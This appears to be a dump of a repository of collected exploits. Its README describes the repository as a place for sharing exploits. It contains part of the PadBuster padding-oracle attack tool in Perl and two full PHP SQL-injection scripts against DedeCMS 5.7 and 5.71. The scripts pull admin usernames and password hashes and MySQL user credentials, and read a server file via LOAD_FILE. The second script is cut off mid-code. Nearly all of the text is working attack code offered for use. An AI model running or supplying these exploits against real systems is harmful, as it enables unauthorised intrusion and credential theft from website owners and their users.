Results:",0); 358 | &myPrint("[+] Cipher Text (HEX): ".&myEncode($sampleBytes,1),0); 359 | &myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1),0); 360 | &myPrint("[+] Plain Text: $decryptedBytes\n",0); 361 | $plainTextBytes = $plainTextBytes.$decryptedBytes; 362 | } 363 | } 364 | 365 | &myPrint("-------------------------------------------------------",0); 366 | &myPrint("** Finished ***\n", 0); 367 | if ($plainTextInput) { 368 | &myPrint("[+] Encrypted value is: ".&uri_escape($forgedBytes),0); 369 | } else { 370 | &myPrint("[+] Decrypted value (ASCII): $plainTextBytes\n",0); 371 | &myPrint("[+] Decrypted value (HEX): ".&myEncode($plainTextBytes,2)."\n", 0); 372 | &myPrint("[+] Decrypted value (Base64): ".&myEncode($plainTextBytes,0)."\n", 0); 373 | } 374 | &myPrint("-------------------------------------------------------\n",0); 375 | 376 | sub determineSignature { 377 | # Help the user detect the oracle response if an error string was not provided 378 | # This logic will automatically suggest the response pattern that occured most often 379 | # during the test as this is the most likeley one 380 | 381 | my @sortedGuesses = sort {$oracleGuesses{$a} <=> $oracleGuesses{$b}} keys %oracleGuesses; 382 | 383 | &myPrint("The following response signatures were returned:\n",0); 384 | &myPrint("-------------------------------------------------------",0); 385 | if ($useBody) { 386 | &myPrint("ID#\tFreq\tStatus\tLength\tChksum\tLocation",0); 387 | } else { 388 | &myPrint("ID#\tFreq\tStatus\tLength\tLocation",0); 389 | } 390 | &myPrint("-------------------------------------------------------",0); 391 | 392 | my $id = 1; 393 | 394 | foreach (@sortedGuesses) { 395 | my $line = $id; 396 | ($id == $#sortedGuesses+1 && $#sortedGuesses != 0) ? $line.= " **" : $line.=""; 397 | my @sigFields = split("\t", $_); 398 | $line .= "\t$oracleGuesses{$_}\t$sigFields[0]\t$sigFields[1]"; 399 | $useBody ? 
( $line .= "\t".unpack( '%32A*', $sigFields[3] ) ) : $line.=""; 400 | $line .= "\t$sigFields[2]"; 401 | &myPrint($line,0); 402 | &writeFile("Response_Analysis_Signature_".$id.".txt", $responseFileBuffer{$_}); 403 | $id++; 404 | } 405 | &myPrint("-------------------------------------------------------",0); 406 | 407 | if ($#sortedGuesses == 0 && !$bruteForce) { 408 | &myPrint("\nERROR: All of the responses were identical.\n",0); 409 | &myPrint("Double check the Block Size and try again.",0); 410 | exit(); 411 | } else { 412 | my $responseNum = &promptUser("\nEnter an ID that matches the error condition\nNOTE: The ID# marked with ** is recommended"); 413 | &myPrint("\nContinuing test with selection $responseNum\n",0); 414 | $oracleSignature = $sortedGuesses[$responseNum-1]; 415 | } 416 | } 417 | 418 | sub prepRequest { 419 | my ($pUrl, $pPost, $pCookie, $pSample, $pTestBytes) = @_; 420 | 421 | # Prepare the request 422 | my $testUrl = $pUrl; 423 | my $wasSampleFound = 0; 424 | 425 | if ($pUrl =~ /$pSample/) { 426 | $testUrl =~ s/$pSample/$pTestBytes/; 427 | $wasSampleFound = 1; 428 | } 429 | 430 | my $testPost = ""; 431 | if ($pPost) { 432 | $testPost = $pPost; 433 | if ($pPost =~ /$pSample/) { 434 | $testPost =~ s/$pSample/$pTestBytes/; 435 | $wasSampleFound = 1; 436 | } 437 | } 438 | 439 | my $testCookies = ""; 440 | if ($pCookie) { 441 | $testCookies = $pCookie; 442 | if ($pCookie =~ /$pSample/) { 443 | $testCookies =~ s/$pSample/$pTestBytes/; 444 | $wasSampleFound = 1; 445 | } 446 | } 447 | 448 | if ($wasSampleFound == 0) { 449 | &myPrint("ERROR: Encrypted sample was not found in the test request",0); 450 | exit(); 451 | } 452 | return ($testUrl, $testPost, $testCookies); 453 | } 454 | 455 | sub processBlock { 456 | my ($sampleBytes) = @_; 457 | my $analysisMode; 458 | # Analysis mode is either 0 (response analysis) or 1 (exploit) 459 | $analysisMode = (!$error && $oracleSignature eq "") ? 
0 : 1; 460 | 461 | # The return value of this subroutine is the intermediate text for the block 462 | my $returnValue; 463 | 464 | my $complete = 0; 465 | my $autoRetry = 0; 466 | my $hasHit = 0; 467 | 468 | while ($complete == 0) { 469 | # Reset the return value 470 | $returnValue = ""; 471 | 472 | my $repeat = 0; 473 | 474 | # TestBytes are the fake bytes that are pre-pending to the cipher test for the padding attack 475 | my $testBytes = "\x00" x $blockSize; 476 | 477 | my $falsePositiveDetector = 0; 478 | 479 | # Work on one byte at a time, starting with the last byte and moving backwards 480 | OUTERLOOP: 481 | for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--) { 482 | INNERLOOP: 483 | for (my $i = 255; $i >= 0; $i--) { 484 | # Fuzz the test byte 485 | substr($testBytes, $byteNum, 1, chr($i)); 486 | 487 | # Combine the test bytes and the sample 488 | my $combinedTestBytes = $testBytes.$sampleBytes; 489 | 490 | if ($prefix) { 491 | $combinedTestBytes = &myDecode($prefix,$encodingFormat).$combinedTestBytes 492 | } 493 | 494 | $combinedTestBytes = &myEncode($combinedTestBytes, $encodingFormat); 495 | chomp($combinedTestBytes); 496 | 497 | if (! $noEncodeOption) { 498 | $combinedTestBytes = &uri_escape($combinedTestBytes); 499 | } 500 | 501 | my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedTestBytes); 502 | 503 | # Ok, now make the request 504 | 505 | my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies); 506 | 507 | 508 | my $signatureData = "$status\t$contentLength\t$location"; 509 | $signatureData = "$status\t$contentLength\t$location\t$content" if $useBody; 510 | 511 | # If this is the first block and there is no padding error message defined, then cycle through 512 | # all possible requests and let the user decide what the padding error behavior is. 
513 | if ($analysisMode == 0) { 514 | &myPrint("INFO: No error string was provided...starting response analysis\n",0) if ($i == 255); 515 | $oracleGuesses{$signatureData}++; 516 | 517 | $responseFileBuffer{$signatureData} = "URL: $testUrl\nPost Data: $testPost\nCookies: $testCookies\n\nStatus: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content"; 518 | 519 | if ($byteNum == $blockSize - 1 && $i == 0) { 520 | &myPrint("*** Response Analysis Complete ***\n",0); 521 | &determineSignature(); 522 | $analysisMode = 1; 523 | $repeat = 1; 524 | last OUTERLOOP; 525 | } 526 | } 527 | 528 | my $continue = "y"; 529 | 530 | if (($error && $content !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) { 531 | # This is for autoretry logic (only works on the first byte) 532 | if ($autoRetry == 1 && ($byteNum == ($blockSize - 1) ) && $hasHit == 0 ) { 533 | $hasHit++; 534 | } else { 535 | # If there was no padding error, then it worked 536 | &myPrint("[+] Success: (".abs($i-256)."/256) [Byte ".($byteNum+1)."]",0); 537 | &myPrint("[+] Test Byte:".&uri_escape(substr($testBytes, $byteNum, 1)),1); 538 | 539 | # If continually getting a hit on attempt zero, then something is probably wrong 540 | $falsePositiveDetector++ if ($i == 255); 541 | 542 | if ($interactive == 1) { 543 | $continue = &promptUser("Do you want to use this value (Yes/No/All)? 
[y/n/a]","",1); 544 | } 545 | 546 | if ($continue eq "y" || $continue eq "a") { 547 | $interactive = 0 if ($continue eq "a"); 548 | 549 | # Next, calculate the decrypted byte by XORing it with the padding value 550 | my ($currentPaddingByte, $nextPaddingByte); 551 | 552 | # These variables could allow for flexible padding schemes (for now PCKS) 553 | # For PCKS#7, the padding block is equal to chr($blockSize - $byteNum) 554 | $currentPaddingByte = chr($blockSize - $byteNum); 555 | $nextPaddingByte = chr($blockSize - $byteNum + 1); 556 | 557 | my $decryptedByte = substr($testBytes, $byteNum, 1) ^ $currentPaddingByte; 558 | &myPrint("[+] XORing with Padding Char, which is ".&uri_escape($currentPaddingByte),1); 559 | 560 | $returnValue = $decryptedByte.$returnValue; 561 | &myPrint("[+] Decrypted Byte is: ".&uri_escape($decryptedByte),1); 562 | 563 | # Finally, update the test bytes in preparation for the next round, based on the padding used 564 | for (my $k = $byteNum; $k < $blockSize; $k++) { 565 | # First, XOR the current test byte with the padding value for this round to recover the decrypted byte 566 | substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $currentPaddingByte)); 567 | 568 | # Then, XOR it again with the padding byte for the next round 569 | substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $nextPaddingByte)); 570 | } 571 | last INNERLOOP; 572 | } 573 | 574 | } 575 | } 576 | 577 | ## TODO: Combine these two blocks? 578 | if ($i == 0 && $analysisMode == 1) { 579 | # End of the road with no success. We should probably try again. 
580 | &myPrint("ERROR: No matching response on [Byte ".($byteNum+1)."]",0); 581 | 582 | if ($autoRetry == 0) { 583 | $autoRetry = 1; 584 | &myPrint(" Automatically trying one more time...",0); 585 | $repeat = 1; 586 | last OUTERLOOP; 587 | 588 | } else { 589 | if (($byteNum == $blockSize - 1) && ($error)) { 590 | &myPrint("\nAre you sure you specified the correct error string?",0); 591 | &myPrint("Try re-running without the -e option to perform a response analysis.\n",0); 592 | } 593 | 594 | $continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1); 595 | if ($continue ne "n") { 596 | &myPrint("INFO: Switching to interactive mode",0); 597 | $interactive = 1; 598 | $repeat = 1; 599 | last OUTERLOOP; 600 | } 601 | } 602 | } 603 | if ($falsePositiveDetector == $blockSize) { 604 | &myPrint("\n*** ERROR: It appears there are false positive results. ***\n",0); 605 | &myPrint("HINT: The most likely cause for this is an incorrect error string.\n",0); 606 | if ($error) { 607 | &myPrint("[+] Check the error string you provided and try again, or consider running",0); 608 | &myPrint("[+] without an error string to perform an automated response analysis.\n",0); 609 | } else { 610 | &myPrint("[+] You may want to consider defining a custom padding error string",0); 611 | &myPrint("[+] instead of the automated response analysis.\n",0); 612 | } 613 | $continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1); 614 | if ($continue eq "y") { 615 | &myPrint("INFO: Switching to interactive mode",0); 616 | $interactive = 1; 617 | $repeat = 1; 618 | last OUTERLOOP; 619 | } 620 | } 621 | } 622 | } 623 | ($repeat == 1) ? 
($complete = 0) : ($complete = 1); 624 | } 625 | return $returnValue; 626 | } 627 | 628 | sub makeRequest { 629 | 630 | my ($method, $url, $data, $cookie) = @_; 631 | my ($noConnect, $lwp, $status, $content, $req, $location, $contentLength); 632 | my $numRetries = 0; 633 | $data ='' unless $data; 634 | $cookie='' unless $cookie; 635 | 636 | $requestTracker++; 637 | do { 638 | #Quick hack to avoid hostname in URL when using a proxy with SSL (this will get re-set later if needed) 639 | $ENV{HTTPS_PROXY} = ""; 640 | 641 | $lwp = LWP::UserAgent->new(env_proxy => 1, 642 | keep_alive => 1, 643 | timeout => 30, 644 | requests_redirectable => [], 645 | ); 646 | 647 | $req = new HTTP::Request $method => $url; 648 | 649 | &myPrint("Request:\n$method\n$url\n$data\n$cookie",0) if $superVerbose; 650 | 651 | # Add request content for POST and PUTS 652 | if ($data) { 653 | $req->content_type('application/x-www-form-urlencoded'); 654 | $req->content($data); 655 | } 656 | 657 | if ($proxy) { 658 | my $proxyUrl = "http://"; 659 | if ($proxyAuth) { 660 | my ($proxyUser, $proxyPass) = split(":",$proxyAuth); 661 | $ENV{HTTPS_PROXY_USERNAME} = $proxyUser; 662 | $ENV{HTTPS_PROXY_PASSWORD} = $proxyPass; 663 | $proxyUrl .= $proxyAuth."@"; 664 | } 665 | $proxyUrl .= $proxy; 666 | $lwp->proxy(['http'], "http://".$proxy); 667 | $ENV{HTTPS_PROXY} = "http://".$proxy; 668 | } 669 | 670 | 671 | if ($auth) { 672 | my ($httpuser, $httppass) = split(/:/,$auth); 673 | $req->authorization_basic($httpuser, $httppass); 674 | } 675 | 676 | # If cookies are defined, add a COOKIE header 677 | if (! 
$cookie eq "") { 678 | $req->header(Cookie => $cookie); 679 | } 680 | 681 | if ($headers) { 682 | my @customHeaders = split(/;/i,$headers); 683 | for (my $i = 0; $i <= $#customHeaders; $i++) { 684 | my ($headerName, $headerVal) = split(/\::/i,$customHeaders[$i]); 685 | $req->header($headerName, $headerVal); 686 | } 687 | } 688 | 689 | my $startTime = &gettimeofday(); 690 | my $response = $lwp->request($req); 691 | my $endTime = &gettimeofday(); 692 | $timeTracker = $timeTracker + ($endTime - $startTime); 693 | 694 | if ($printStats == 1 && $requestTracker % 250 == 0) { 695 | print "[+] $requestTracker Requests Issued (Avg Request Time: ".(sprintf "%.3f", $timeTracker/100).")\n"; 696 | $timeTracker = 0; 697 | } 698 | 699 | 700 | # Extract the required attributes from the response 701 | $status = substr($response->status_line, 0, 3); 702 | $content = $response->content; 703 | 704 | &myPrint("Response Content:\n$content",0) if $superVerbose; 705 | $location = $response->header("Location"); 706 | if (!$location) { 707 | $location = "N/A"; 708 | } 709 | #$contentLength = $response->header("Content-Length"); 710 | $contentLength = length($content); 711 | 712 | 713 | my $contentEncoding = $response->header("Content-Encoding"); 714 | if ($contentEncoding) { 715 | if ($contentEncoding =~ /GZIP/i ) { 716 | $content = Compress::Zlib::memGunzip($content); 717 | $contentLength = length($content); 718 | } 719 | } 720 | 721 | my $statusMsg = $response->status_line; 722 | #myPrint("Status: $statusMsg, Location: $location, Length: $contentLength",1); 723 | 724 | if ($statusMsg =~ /Can't connect/) { 725 | print "ERROR: $statusMsg\n Retrying in 10 seconds...\n\n"; 726 | $noConnect = 1; 727 | $numRetries++; 728 | sleep 10; 729 | } else { 730 | $noConnect = 0; 731 | $totalRequests++; 732 | } 733 | } until (($noConnect == 0) || ($numRetries >= 15)); 734 | if ($numRetries >= 15) { 735 | &myPrint("ERROR: Number of retries has exceeded 15 attempts...quitting.\n",0); 736 | exit; 737 | } 738 
| return ($status, $content, $location, $contentLength); 739 | } 740 | 741 | sub myPrint { 742 | my ($printData, $printLevel) = @_; 743 | $printData .= "\n"; 744 | if (($verbose && $printLevel > 0) || $printLevel < 1 || $superVerbose) { 745 | print $printData; 746 | &writeFile("ActivityLog.txt",$printData); 747 | } 748 | } 749 | 750 | sub myEncode { 751 | my ($toEncode, $format) = @_; 752 | return &encodeDecode($toEncode, 0, $format); 753 | } 754 | 755 | sub myDecode { 756 | my ($toDecode, $format) = @_; 757 | return &encodeDecode($toDecode, 1, $format); 758 | } 759 | 760 | sub encodeDecode { 761 | my ($toEncodeDecode, $oper, $format) = @_; 762 | # Oper: 0=Encode, 1=Decode 763 | # Format: 0=Base64, 1 Hex Lower, 2 Hex Upper, 3=NetUrlToken 764 | my $returnVal = ""; 765 | if ($format == 1 || $format == 2) { 766 | # HEX 767 | if ($oper == 1) { 768 | #Decode 769 | #Always convert to lower when decoding) 770 | $toEncodeDecode = lc($toEncodeDecode); 771 | $returnVal = pack("H*",$toEncodeDecode); 772 | } else { 773 | #Encode 774 | $returnVal = unpack("H*",$toEncodeDecode); 775 | if ($format == 2) { 776 | #Uppercase 777 | $returnVal = uc($returnVal) 778 | } 779 | } 780 | } elsif ($format == 3) { 781 | # NetUrlToken 782 | if ($oper == 1) { 783 | $returnVal = &web64Decode($toEncodeDecode,1); 784 | } else { 785 | $returnVal = &web64Encode($toEncodeDecode,1); 786 | } 787 | } elsif ($format == 4) { 788 | # Web64 789 | if ($oper == 1) { 790 | $returnVal = &web64Decode($toEncodeDecode,0); 791 | } else { 792 | $returnVal = &web64Encode($toEncodeDecode,0); 793 | } 794 | } else { 795 | # B64 796 | if ($oper == 1) { 797 | $returnVal = &decode_base64($toEncodeDecode); 798 | } else { 799 | $returnVal = &encode_base64($toEncodeDecode); 800 | $returnVal =~ s/(\r|\n)//g; 801 | } 802 | } 803 | 804 | return $returnVal; 805 | } 806 | 807 | 808 | sub web64Encode { 809 | my ($input, $net) = @_; 810 | # net: 0=No Padding Number, 1=Padding (NetUrlToken) 811 | $input = &encode_base64($input); 812 
| $input =~ s/(\r|\n)//g; 813 | $input =~ s/\+/\-/g; 814 | $input =~ s/\//\_/g; 815 | my $count = $input =~ s/\=//g; 816 | $count = 0 if ($count eq ""); 817 | $input.=$count if ($net == 1); 818 | return $input; 819 | } 820 | 821 | sub web64Decode { 822 | my ($input, $net) = @_; 823 | # net: 0=No Padding Number, 1=Padding (NetUrlToken) 824 | $input =~ s/\-/\+/g; 825 | $input =~ s/\_/\//g; 826 | if ($net == 1) { 827 | my $count = chop($input); 828 | $input = $input.("=" x int($count)); 829 | } 830 | return &decode_base64($input); 831 | } 832 | 833 | 834 | sub promptUser { 835 | my($prompt, $default, $yn) = @_; 836 | my $defaultValue = $default ? "[$default]" : ""; 837 | print "$prompt $defaultValue: "; 838 | chomp(my $input = ); 839 | 840 | $input = $input ? $input : $default; 841 | if ($yn) { 842 | if ($input =~ /^y|n|a$/) { 843 | return $input; 844 | } else { 845 | &promptUser($prompt, $default, $yn); 846 | } 847 | } else { 848 | if ($input =~ /^-?\d/ && $input > 0 && $input < 256) { 849 | return $input; 850 | } else { 851 | &promptUser($prompt, $default); 852 | } 853 | } 854 | } 855 | 856 | sub writeFile { 857 | my ($fileName, $fileContent) = @_; 858 | if ($logFiles) { 859 | if ($dirExists != 1) { 860 | system($dirCmd." 
".$dirName); 861 | $dirExists = 1; 862 | } 863 | $fileName = $dirName.$dirSlash.$fileName; 864 | open(my $OUTFILE, '>>', $fileName) or die "ERROR: Can't write to file $fileName\n"; 865 | print $OUTFILE $fileContent; 866 | close($OUTFILE); 867 | } 868 | } 869 | 870 | sub getTime { 871 | my ($format) = @_; 872 | my ($second, $minute, $hour, $day, $month, $year, $weekday, $dayofyear, $isDST) = localtime(time); 873 | my @months = ("JAN","FEB","MAR","APR","MAY","JUN","JUL","AUG","SEP","OCT","NOV","DEC"); 874 | my @days = ("SUN","MON","TUE","WED","THU","FRI","SAT"); 875 | $month=sprintf("%02d",$month); 876 | $day=sprintf("%02d",$day); 877 | $hour=sprintf("%02d",$hour); 878 | $minute=sprintf("%02d",$minute); 879 | $second=sprintf("%02d", $second); 880 | $year =~ s/^.//; 881 | if ($format eq "F") { 882 | return $day.$months[$month].$year."-".( ($hour * 3600) + ($minute * 60) + ($second) ); 883 | } elsif ($format eq "S") { 884 | return $months[$month]." ".$day.", 20".$year." at ".$hour.":".$minute.":".$second; 885 | } else { 886 | return $hour.":".$minute.":".$second; 887 | } 888 | } 889 | 890 | -------------------------------------------------------------------------------- /PadBuster-Padding Oracle Attack/参考.txt: -------------------------------------------------------------------------------- 1 | http://www.secpulse.com/archives/3537.html -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | just for 分享各种exp 2 | 3 | 4 | exp都是从各地收集而来,原来标有作者的信息的并不会被删除,若没有的,作者看到可联系我加上作者信息或者要求删除。 5 | -------------------------------------------------------------------------------- /Shopex/4.8.4.htm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/Shopex/4.8.4.htm -------------------------------------------------------------------------------- 
/Shopex/4.8.5.htm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/Shopex/4.8.5.htm -------------------------------------------------------------------------------- /Shopex/exploit.htm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/Shopex/exploit.htm -------------------------------------------------------------------------------- /dede/Dede v5.7 feedback.php-12-10-31.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/dede/Dede v5.7 feedback.php-12-10-31.html -------------------------------------------------------------------------------- /dede/buy_action.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/dede/buy_action.php -------------------------------------------------------------------------------- /dede/dede_5.7.php: -------------------------------------------------------------------------------- 1 | ". 16 | "\n[+] Exp : php ".$argv[0]." localhost /". 
17 | 18 | "\n\n"); 19 | } 20 | 21 | function query($biao,$chr,$chs) 22 | { 23 | global $pre; 24 | switch ($chs){ 25 | case 1: 26 | $query = "@`\'` Union select concat(0x7e,0x27,count(*),0x27,0x7e) from `".$pre."admin` where 1 or id=@`\'`"; 27 | break; 28 | case 2: 29 | $query = "@`\'` Union select concat(0x7e,0x27,userid,0x7C,pwd,0x27,0x7e) from `".$pre."admin` limit $chr,1 Union select concat(0x7e,0x27,userid,0x7C,pwd,0x27,0x7e) from `".$pre."admin` where 1=2 or id=@`\'`"; 30 | break; 31 | case 3: 32 | $query = "'"; 33 | break; 34 | case 4: 35 | $query = "@`\'` Union select concat(0x7e,0x27,count(*),0x27,0x7e) from `mysql`.user where 1 or user=@`\'`"; 36 | break; 37 | case 5: 38 | $query = "@`\'` Union select concat(0x7e,0x27,Host,0x7C,User,0x7C,Password,0x7C,Select_priv,0x27,0x7e) from `mysql`.user limit $chr,1 Union select 1 from `".$pre."admin` where 1=2 or id=@`\'`"; 39 | break; 40 | case 6: 41 | $query = "@`\'` Union select concat(0x7e,0x27,Load_file(0x633A5C626F6F742E696E69),0x27,0x7e) from `mysql`.user where 1 or user=@`\'`"; 42 | break; 43 | } 44 | //echo $query."\r\n"; 45 | $query = urlencode($query); 46 | return $query; 47 | } 48 | 49 | function exploit($hostname, $path,$biao, $chr, $chs) 50 | { 51 | $conn = fsockopen($hostname, 80); 52 | if (!$conn){ 53 | exit("\r\n[-] No response from $conn\n"); 54 | } 55 | 56 | $postdata = "action=post&membergroup=".query($biao,$chr,$chs); 57 | $message = "POST ".$path."member/ajax_membergroup.php HTTP/1.1\r\n"; 58 | $message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*\r\n"; 59 | $message .= "Accept-Language: zh-cn\r\n"; 60 | $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; 61 | $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; 
62 | $message .= "Host: $hostname\r\n"; 63 | $message .= "Content-Length: ".strlen($postdata)."\r\n"; 64 | $message .= "Cookie: $sessions\r\n"; 65 | $message .= "Connection: Close\r\n\r\n"; 66 | $message .= $postdata; 67 | //echo $message ; 68 | $inheader = 1; 69 | fputs($conn, $message); 70 | while (!feof($conn)) 71 | $reply .= fread($conn, 1024); 72 | fclose($conn); 73 | //print $reply; 74 | 75 | 76 | $reply=substr($reply,strpos($reply,"\r\n\r\n")); 77 | //echo $reply; 78 | //echo iconv('UTF-8', 'GB2312', $reply); 79 | return $reply; 80 | } 81 | 82 | 83 | function GetPre($hostname,$path) 84 | { 85 | $tmp = array(); 86 | $exit = 0; 87 | while ($exit==0) 88 | { 89 | $response = exploit($hostname, $path,1,1,3); 90 | //echo $response; 91 | if (preg_match("/FROM (.*?)member_group/i",$response,$tmp)) 92 | { 93 | $exit = 1; 94 | return $tmp[1]; 95 | } 96 | else 97 | return "dede_"; 98 | } 99 | } 100 | 101 | function dbcounts($hostname,$path) 102 | { 103 | $tmp = array(); 104 | $exit = 0; 105 | while ($exit==0) 106 | { 107 | $response = exploit($hostname, $path,1,1,4); 108 | //echo $response; 109 | if (preg_match("/\~\'(.*?)\'\~/i",$response,$tmp)) 110 | { 111 | $exit = 1; 112 | return $tmp[1]; 113 | } 114 | else 115 | return "Can't Get\r\n"; 116 | } 117 | } 118 | 119 | function counts($hostname,$path) 120 | { 121 | $tmp = array(); 122 | $exit = 0; 123 | while ($exit==0) 124 | { 125 | $response = exploit($hostname, $path,1,1,1); 126 | //echo $response; 127 | if (preg_match("/\~\'(.*?)\'\~/i",$response,$tmp)) 128 | { 129 | $exit = 1; 130 | return $tmp[1]; 131 | } 132 | else 133 | return "Can't Get\r\n"; 134 | } 135 | } 136 | 137 | function GetDBUser($hostname,$path,$c) 138 | { 139 | $tmp = array(); 140 | $exit = 0; 141 | while ($exit==0) 142 | { 143 | $response = exploit($hostname, $path,1,$c-1,5); 144 | if (preg_match("/\~\'(.*?)\'\~/i",$response,$tmp)) 145 | { 146 | $exit = 1; 147 | return $tmp[1]; 148 | } 149 | else 150 | return "Can't Get\r\n"; 151 | } 152 | } 153 | 
154 | function GetUser($hostname,$path,$c) 155 | { 156 | $tmp = array(); 157 | $exit = 0; 158 | while ($exit==0) 159 | { 160 | $response = exploit($hostname, $path,1,$c-1,2); 161 | if (preg_match("/\~\'(.*?)\'\~/i",$response,$tmp)) 162 | { 163 | $exit = 1; 164 | return $tmp[1]; 165 | } 166 | else 167 | return "Can't Get\r\n"; 168 | } 169 | } 170 | 171 | /////////////////////////////////////////////////////////////////// 172 | /////////////////////////////////////////////////////////////////// 173 | 174 | if ($argc != 3) 175 | usage(); 176 | $hostname = $argv[1]; 177 | $path = $argv[2]; 178 | echo "[+] =======================================================\n"; 179 | echo "[+] Pre: "; 180 | ob_flush(); 181 | flush(); 182 | $pre=GetPre($hostname, $path); 183 | echo $pre."\n"; 184 | echo "[+] DbCount: "; 185 | ob_flush(); 186 | flush(); 187 | $dbcount=dbcounts($hostname, $path); 188 | echo $dbcount."\n"; 189 | /////////////////////////////////////////////////////////////////// 190 | $c=1; 191 | /////////////////////////////////////////////////////////////////// 192 | while($c<=$dbcount){ 193 | echo "[+] <".($c).">\r\n"; 194 | ob_flush(); 195 | flush(); 196 | $dbuser=GetDBUser($hostname,$path,$c); 197 | echo $dbuser."\n"; 198 | $c++; 199 | } 200 | /////////////////////////////////////////////////////////////////// 201 | echo "[+] Admin@Count: "; 202 | ob_flush(); 203 | flush(); 204 | $count=counts($hostname, $path); 205 | echo $count."\n"; 206 | ob_flush(); 207 | flush(); 208 | /////////////////////////////////////////////////////////////////// 209 | $c=1; 210 | /////////////////////////////////////////////////////////////////// 211 | while($c<=$count){ 212 | echo "[+] <".($c).">\r\n"; 213 | ob_flush(); 214 | flush(); 215 | $user=GetUser($hostname,$path,$c); 216 | echo $user."\n"; 217 | $c++; 218 | } 219 | /////////////////////////////////////////////////////////////////// 220 | ?> -------------------------------------------------------------------------------- 
/dede/dede_5.71.php: -------------------------------------------------------------------------------- 1 | ". 16 | "\n[+] Exp : php ".$argv[0]." localhost /". 17 | 18 | "\n\n"); 19 | } 20 | 21 | function query($biao,$chr,$chs) 22 | { 23 | global $pre; 24 | switch ($chs){ 25 | case 1: 26 | $query = "`a\'` and(SELECT/*\'\'*/1 FROM(select/*\'\'*/count(*),concat(floor(rand(0)*2),(SELECT/*\'\'*/concat(0x5b,count(*),0x5d) from ".$pre."admin))a from information_schema.tables group by a)b)"; 27 | break; 28 | case 2: 29 | $query = "`a\'` and(SELECT/*\'\'*/1 FROM(select/*\'\'*/count(*),concat(floor(rand(0)*2),(SELECT/*\'\'*/concat(0x5b,userid,0x3a,pwd,0x5d) from ".$pre."admin Limit ".$chr.",1))a from information_schema.tables group by a)b)"; 30 | break; 31 | case 3: 32 | $query = "'"; 33 | break; 34 | case 4: 35 | $query = "`a\'` and(SELECT/*\'\'*/1 FROM(select/*\'\'*/count(*),concat(floor(rand(0)*2),(SELECT/*\'\'*/concat(0x5b,count(*),0x5d) from mysql.user))a from information_schema.tables group by a)b)"; 36 | break; 37 | case 5: 38 | $query = "`a\'` and(SELECT/*\'\'*/1 FROM(select/*\'\'*/count(*),concat(floor(rand(0)*2),(SELECT/*\'\'*/concat(0x5b,Host,0x7C,User,0x7C,Password,0x7C,File_priv,0x5d) from mysql.user Limit ".$chr.",1))a from information_schema.tables group by a)b)"; 39 | break; 40 | } 41 | //echo $query."\r\n"; 42 | $query = urlencode($query); 43 | return $query; 44 | } 45 | 46 | function exploit($hostname, $path,$biao, $chr, $chs) 47 | { 48 | $conn = fsockopen($hostname, 80); 49 | if (!$conn){ 50 | exit("\r\n[-] No response from $conn\n"); 51 | } 52 | 53 | $postdata = "action=post&membergroup=".query($biao,$chr,$chs); 54 | $message = "POST ".$path."member/ajax_membergroup.php HTTP/1.1\r\n"; 55 | $message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, 
application/xaml+xml, */*\r\n"; 56 | $message .= "Accept-Language: zh-cn\r\n"; 57 | $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; 58 | $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; 59 | $message .= "Host: $hostname\r\n"; 60 | $message .= "Content-Length: ".strlen($postdata)."\r\n"; 61 | $message .= "Cookie: $sessions\r\n"; 62 | $message .= "Connection: Close\r\n\r\n"; 63 | $message .= $postdata; 64 | //echo $message ; 65 | $inheader = 1; 66 | fputs($conn, $message); 67 | while (!feof($conn)) 68 | $reply .= fread($conn, 1024); 69 | fclose($conn); 70 | //print $reply; 71 | 72 | 73 | $reply=substr($reply,strpos($reply,"\r\n\r\n")); 74 | //echo $reply; 75 | //echo iconv('UTF-8', 'GB2312', $reply); 76 | return $reply; 77 | } 78 | 79 | 80 | function GetPre($hostname,$path) 81 | { 82 | $tmp = array(); 83 | $exit = 0; 84 | while ($exit==0) 85 | { 86 | $response = exploit($hostname, $path,1,1,3); 87 | //echo $response; 88 | if (preg_match("/FROM (.*?)member_group/i",$response,$tmp)) 89 | { 90 | $exit = 1; 91 | return $tmp[1]; 92 | } 93 | else 94 | return "dede_"; 95 | } 96 | } 97 | 98 | function dbcounts($hostname,$path) 99 | { 100 | $tmp = array(); 101 | $exit = 0; 102 | while ($exit==0) 103 | { 104 | $response = exploit($hostname, $path,1,1,4); 105 | //echo $response; 106 | if (preg_match("/\[(.*?)\]/i",$response,$tmp)) 107 | { 108 | $exit = 1; 109 | return $tmp[1]; 110 | } 111 | else 112 | return "Can't 